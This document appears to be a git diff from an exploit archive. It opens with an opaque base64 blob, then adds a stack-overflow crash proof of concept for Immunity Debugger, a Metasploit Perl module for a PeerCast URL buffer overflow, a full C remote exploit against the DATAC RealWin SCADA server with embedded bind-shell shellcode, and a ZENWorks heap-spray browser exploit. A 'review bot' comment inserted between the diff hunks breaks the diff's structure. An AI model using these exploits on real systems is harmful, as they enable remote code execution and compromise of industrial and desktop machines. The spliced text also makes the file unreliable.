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 
+0mUj+/UJr5crMjh/Kw7pva/6QMQ9ewBABwA=
+
diff --git a/platforms/windows/dos/32435.c b/platforms/windows/dos/32435.c
new file mode 100755
index 000000000..74ea7d55e
--- /dev/null
+++ b/platforms/windows/dos/32435.c
@@ -0,0 +1,46 @@
+/* Filename : Crash_POC.cpp
+
+# Exploit Title: [title]
+# Date: 20 March 2014
+# Exploit Author: Veysel HATAS (vhatas@gmail.com) - Web Page : www.binarysniper.net
+# Vendor Homepage: https://www.immunityinc.com/
+# Software Link: https://www.immunityinc.com/products-immdbg.shtml
+# Version: 1.85
+# Tested on: WinXP, Win7
+
+*/
+
+#include
+#include
+#include
+
+int g_Count;
+
+void foo(char *data);
+
+int main(int argc, char* argv[])
+{
+ g_Count = 0;
+
+ foo(argv[1]);
+ return 0;
+}
+
+void foo(char *data)
+{
+ char salla[10];
+
+ printf("Deneme - %d\n", g_Count);
+ g_Count++;
+
+ if (g_Count == 510){
+ strcpy(salla, data);
+ }
+
+ try{
+ foo(data);
+ }
+ catch(int e){
+ printf("Error code is : %d", e);
+ }
+}
\ No newline at end of file
diff --git a/platforms/windows/remote/1626.pm b/platforms/windows/remote/1626.pm
index 876369f50..c376b3ce3 100755
--- a/platforms/windows/remote/1626.pm
+++ b/platforms/windows/remote/1626.pm
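Review bot: `foo(argv[1])` in main hands argv[1] to foo without checking argc, so running the PoC with no argument makes `strcpy(salla, data)` read through a null pointer and the program faults before the condition the author is demonstrating is ever reached; guard it with `if (argc < 2) { return 1; }` before the call. `try`/`catch` and the `Crash_POC.cpp` name in the header comment mark this as C++, so the file will not compile as C under the `.c` path it is committed to. The three `#include` lines carry no header names, which looks like a rendering loss rather than the author's text and should be confirmed against the original submission. foo recurses unconditionally, so the stack exhaustion is the intended behaviour rather than a defect, but a one-line comment such as `// unbounded recursion is intentional: the PoC exhausts the stack` would spare the next reader a double-take.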
@@ -1,119 +1,119 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::peercast_url_win32; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - - 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)', - 'Version' => '$Revision: 1.2 $', - 'Authors' => [ 'H D Moore ', ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32' ], - 'Priv' => 0, - - 'AutoOpts' => { 'EXITFUNC' => 'process' }, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 7144], - 'SSL' => [0, 'BOOL', 'Use SSL'], - }, - - 'Payload' => - { - 'Space' => 400, - 'BadChars' => "\x00\x0a\x0d\x20\x0d", - 'Keys' => ['+ws2ord'], - 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a stack overflow in PeerCast <= v0.1216. - The vulnerability is caused due to a boundary error within the - handling of URL parameters. 
-}), - - 'Refs' => - [ - ['OSVDB', '23777'], - ['BID', '17040'], - ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], - ], - - 'Targets' => - [ - ['Windows 2000 English SP0-SP4', 0x75023360 ], - ['Windows 2003 English SP0-SP1', 0x77d099e3 ], - ['Windows XP English SP0/SP1', 0x77dbfa2c], - ['Windows XP English SP0/SP2', 0x77dc12b8], - ], - - 'Keys' => ['peercast'], - - 'DisclosureDate' => 'March 8 2006', - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit -{ - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $offset = $self->GetVar('OFFSET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target = $self->Targets->[$target_idx]; - - my $pattern = Pex::Text::AlphaNumText(1024); - - # Return to EDI (offset 812) - substr($pattern, 768, 4, pack('V', $target->[1])); - - # Jump back to the shellcode - substr($pattern, 812, 5, "\xe9".pack("V", -517)); - - # Insert he payload at offset 300 to avoid corruption - substr($pattern, 300, length($shellcode), $shellcode); - - my $sploit = "GET /stream/?". $pattern ." HTTP/1.0\r\n\r\n"; - $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1])); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $s->Send($sploit); - $self->Handler($s); - $s->Close(); - return; -} - -1; - -# milw0rm.com [2006-03-30] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. 
In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::peercast_url_win32; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + + 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)', + 'Version' => '$Revision: 1.2 $', + 'Authors' => [ 'H D Moore ', ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32' ], + 'Priv' => 0, + + 'AutoOpts' => { 'EXITFUNC' => 'process' }, + + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 7144], + 'SSL' => [0, 'BOOL', 'Use SSL'], + }, + + 'Payload' => + { + 'Space' => 400, + 'BadChars' => "\x00\x0a\x0d\x20\x0d", + 'Keys' => ['+ws2ord'], + 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits a stack overflow in PeerCast <= v0.1216. + The vulnerability is caused due to a boundary error within the + handling of URL parameters. 
+}), + + 'Refs' => + [ + ['OSVDB', '23777'], + ['BID', '17040'], + ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], + ], + + 'Targets' => + [ + ['Windows 2000 English SP0-SP4', 0x75023360 ], + ['Windows 2003 English SP0-SP1', 0x77d099e3 ], + ['Windows XP English SP0/SP1', 0x77dbfa2c], + ['Windows XP English SP0/SP2', 0x77dc12b8], + ], + + 'Keys' => ['peercast'], + + 'DisclosureDate' => 'March 8 2006', + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit +{ + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $offset = $self->GetVar('OFFSET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $target = $self->Targets->[$target_idx]; + + my $pattern = Pex::Text::AlphaNumText(1024); + + # Return to EDI (offset 812) + substr($pattern, 768, 4, pack('V', $target->[1])); + + # Jump back to the shellcode + substr($pattern, 812, 5, "\xe9".pack("V", -517)); + + # Insert he payload at offset 300 to avoid corruption + substr($pattern, 300, length($shellcode), $shellcode); + + my $sploit = "GET /stream/?". $pattern ." HTTP/1.0\r\n\r\n"; + $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1])); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $s->Send($sploit); + $self->Handler($s); + $s->Close(); + return; +} + +1; + +# milw0rm.com [2006-03-30] diff --git a/platforms/windows/remote/32426.c b/platforms/windows/remote/32426.c new file mode 100755 index 000000000..8e7d68f01 --- /dev/null +++ b/platforms/windows/remote/32426.c 
@@ -0,0 +1,214 @@ +source: http://www.securityfocus.com/bid/31418/info + +DATAC RealWin SCADA server is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. + +An attacker can exploit this issue to execute arbitrary code in the context of the affected application. This may facilitate the complete compromise of affected computers. Failed exploit attempts may result in a denial-of-service condition. + +RealWin SCADA server 2.0 is affected; other versions may also be vulnerable. + +//////////////////////////////////////////////////////////////////// +//// DATAC RealWin 2.0 SCADA Software - Remote PreAuth Exploit -. +//// -------------------------------------------------------- +//// This code can only be used for personal study +//// and/or research purposes on even days. +//// +//// The author is not responsible for any illegal usage. +//// So if you flood your neighborhood that's your f******* problem =) +//// --------------- +//// Note +//// --------------- +//// ## The exploit has been tested against a build that seems pretty old. +//// ## Therefore this flaw may be not reproducible on newer versions. 
+//// +//// http://www.dataconline.com +//// http://www.realflex.com/download/form.php +//// +//// Ruben Santamarta www.reversemode.com +//// + +#include +#include +#include + +#pragma comment(lib,"wsock32.lib") + + +#define REALWIN_PORT 910 +#define PACKET_HEADER_MAGIC 0x67542310 + +#define EXPLOIT_LEN 0x810 +#define PING_LEN 0x200 + +#define FUNC_INFOTAG_SET_CONTROL 0x5000A +#define FUNC_PING 0x70001 + + +typedef struct { + const char *szTarget; + ULONG_PTR retAddr; +} TARGET; + + +TARGET targets[] = { + { "Windows 2000 SP4 [ES]", 0x779D4F6A}, // call esp - oleaut32.dll + { "Windows 2000 SP4 [EN]", 0x77E3C256 }, // jmp esp - user32.dll + { "Windows XP SP2 [EN]", 0x7C914393 }, // call esp - ntdll.dll + { "Windows XP SP2 [ES]", 0x7711139B}, // call esp - oleaut32.dll + { NULL,0xFFFFFFFF} +}; + +int main(int argc, char* argv[]) +{ + WSADATA ws; + SOCKET tcp_socket, tcp_ping; + char bBuffer[0x10] = {0}; + struct sockaddr_in peer; + char *pExploitPacket = NULL; + char *pPingPacket = NULL; + ULONG_PTR uFixed; + + /* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ + unsigned char scode[] = + "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa5" + "\xd8\xfb\x1b\x83\xeb\xfc\xe2\xf4\x59\xb2\x10\x56\x4d\x21\x04\xe4" + "\x5a\xb8\x70\x77\x81\xfc\x70\x5e\x99\x53\x87\x1e\xdd\xd9\x14\x90" + "\xea\xc0\x70\x44\x85\xd9\x10\x52\x2e\xec\x70\x1a\x4b\xe9\x3b\x82" + "\x09\x5c\x3b\x6f\xa2\x19\x31\x16\xa4\x1a\x10\xef\x9e\x8c\xdf\x33" + "\xd0\x3d\x70\x44\x81\xd9\x10\x7d\x2e\xd4\xb0\x90\xfa\xc4\xfa\xf0" + "\xa6\xf4\x70\x92\xc9\xfc\xe7\x7a\x66\xe9\x20\x7f\x2e\x9b\xcb\x90" + "\xe5\xd4\x70\x6b\xb9\x75\x70\x5b\xad\x86\x93\x95\xeb\xd6\x17\x4b" + "\x5a\x0e\x9d\x48\xc3\xb0\xc8\x29\xcd\xaf\x88\x29\xfa\x8c\x04\xcb" + "\xcd\x13\x16\xe7\x9e\x88\x04\xcd\xfa\x51\x1e\x7d\x24\x35\xf3\x19" + "\xf0\xb2\xf9\xe4\x75\xb0\x22\x12\x50\x75\xac\xe4\x73\x8b\xa8\x48" + "\xf6\x8b\xb8\x48\xe6\x8b\x04\xcb\xc3\xb0\xea\x47\xc3\x8b\x72\xfa" + 
"\x30\xb0\x5f\x01\xd5\x1f\xac\xe4\x73\xb2\xeb\x4a\xf0\x27\x2b\x73" + "\x01\x75\xd5\xf2\xf2\x27\x2d\x48\xf0\x27\x2b\x73\x40\x91\x7d\x52" + "\xf2\x27\x2d\x4b\xf1\x8c\xae\xe4\x75\x4b\x93\xfc\xdc\x1e\x82\x4c" + "\x5a\x0e\xae\xe4\x75\xbe\x91\x7f\xc3\xb0\x98\x76\x2c\x3d\x91\x4b" + "\xfc\xf1\x37\x92\x42\xb2\xbf\x92\x47\xe9\x3b\xe8\x0f\x26\xb9\x36" + "\x5b\x9a\xd7\x88\x28\xa2\xc3\xb0\x0e\x73\x93\x69\x5b\x6b\xed\xe4" + "\xd0\x9c\x04\xcd\xfe\x8f\xa9\x4a\xf4\x89\x91\x1a\xf4\x89\xae\x4a" + "\x5a\x08\x93\xb6\x7c\xdd\x35\x48\x5a\x0e\x91\xe4\x5a\xef\x04\xcb" + "\x2e\x8f\x07\x98\x61\xbc\x04\xcd\xf7\x27\x2b\x73\x4a\x16\x1b\x7b" + "\xf6\x27\x2d\xe4\x75\xd8\xfb\x1b"; + + int i,c; + + system("cls"); + printf("\n\t\t- DATAC RealWin 2.0 SCADA Software -\n"); + printf("\tProtocol Command INFOTAG/SET_CONTROL Stack Overflow\n"); + printf("\nRuben Santamarta - reversemode.com \n\n"); + + if( argc < 3 ) + { + + printf("\nusage: exploit.exe ip TargetNumber"); + printf("\n\nexample: exploit 192.168.1.44 1\n\n"); + for( i = 0; targets[i].szTarget; i++ ) + { + printf("\n[ %d ] - %s", i, targets[i].szTarget); + } + printf("\n"); + exit(0); + } + + WSAStartup(0x0202,&ws); + + peer.sin_family = AF_INET; + peer.sin_port = htons( REALWIN_PORT ); + peer.sin_addr.s_addr = inet_addr( argv[1] ); + + tcp_socket = socket(AF_INET, SOCK_STREAM, 0); + + if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(sockaddr_in)) ) + { + printf("\n[!!] Host unreachable :( \n\n"); + exit(0); + } + + pExploitPacket = (char*) calloc( EXPLOIT_LEN, sizeof(char) ); + pPingPacket = (char*) calloc( PING_LEN, sizeof(char) ); + + memset( (void*)pExploitPacket, 0x90, EXPLOIT_LEN); + memset( (void*)pPingPacket, 0x90, PING_LEN); + + uFixed = targets[atoi(argv[2])].retAddr; + + for( i=0x0; i< 0xbe; i++) + { + *( ( ULONG_PTR* ) (BYTE*)(pExploitPacket + i*sizeof(ULONG_PTR) +2 ) ) = uFixed; + } + + // Bypass silly things. 
+ *( ( ULONG_PTR* ) (BYTE*)(pExploitPacket + 0xbe*sizeof(ULONG_PTR) +2 ) ) = 0x404040; + + // MAGIC_HEADER + *( ( ULONG_PTR* ) pExploitPacket ) = PACKET_HEADER_MAGIC; + + //Payload Length + *( ( ULONG_PTR* ) pExploitPacket + 1 ) = 0x800; + + //MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL) + *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 10 ) ) = FUNC_INFOTAG_SET_CONTROL; + + //First Parameter + *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 14 ) ) = 0x4; // Internal Switch + + //Mark + *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 44 ) ) = 0xDEADBEEF; // Our marker + + + memcpy( (void*)((char*)pExploitPacket + EXPLOIT_LEN - sizeof(scode)) + ,scode + ,sizeof(scode)-1); + + send(tcp_socket, pExploitPacket, EXPLOIT_LEN, 0 ); + + printf("[+] Exploit packet sent...now checking host availability\n"); + + // MAGIC_HEADER + *( ( ULONG_PTR* ) pPingPacket ) = PACKET_HEADER_MAGIC; + + //Payload Length + *( ( ULONG_PTR* ) pPingPacket + 1 ) = 0x20; + + //MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL) + *( (ULONG_PTR*)(( BYTE*) pPingPacket + 10 ) ) = FUNC_PING; + + //First Parameter + *( (ULONG_PTR*)(( BYTE*) pPingPacket + 14 ) ) = 0x1; // whatever + + //Mark + *( (ULONG_PTR*)(( BYTE*) pPingPacket + 44 ) ) = 0xDEADBEEF; //Our marker + + tcp_ping = socket(AF_INET, SOCK_STREAM, 0); + + if ( connect(tcp_ping, (struct sockaddr*) &peer, sizeof(sockaddr_in)) ) + { + printf("\n[!!] Host died, long live to the Host! 
\n\n"); + exit(0); + } + + i = recv(tcp_ping, bBuffer, 0x8, 0 ); + + if( i ) + { + printf("[+] The host is up and running\n\t:: %d bytes received: ",i); + for( c = 0; c < head> < title>Novell ZENWorks for Desktops Version 6.5 Remote (Heap-Based) PoC < /head> < body> < script> var buffa1 = unescape("%uce90%u08bc") do { buffa1 += buffa1; } while (buffa1.length < 0x900000); var buffa2 = unescape("%u9090%u9090") do { buffa2 += buffa2; } while (buffa2.length < 0x1500000); buffa1 += buffa2; buffa1 += unescape("%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); < /script> < object id="victim" classid="clsid:0F517994-A6FA-4F39-BD4B-EC2DF00AEEF1"> < /object> < script language="vbscript"> appName = String(300, "A") + "?????" victim.CanUninstall appName < /script> < /body> < /html> \ No newline at end of file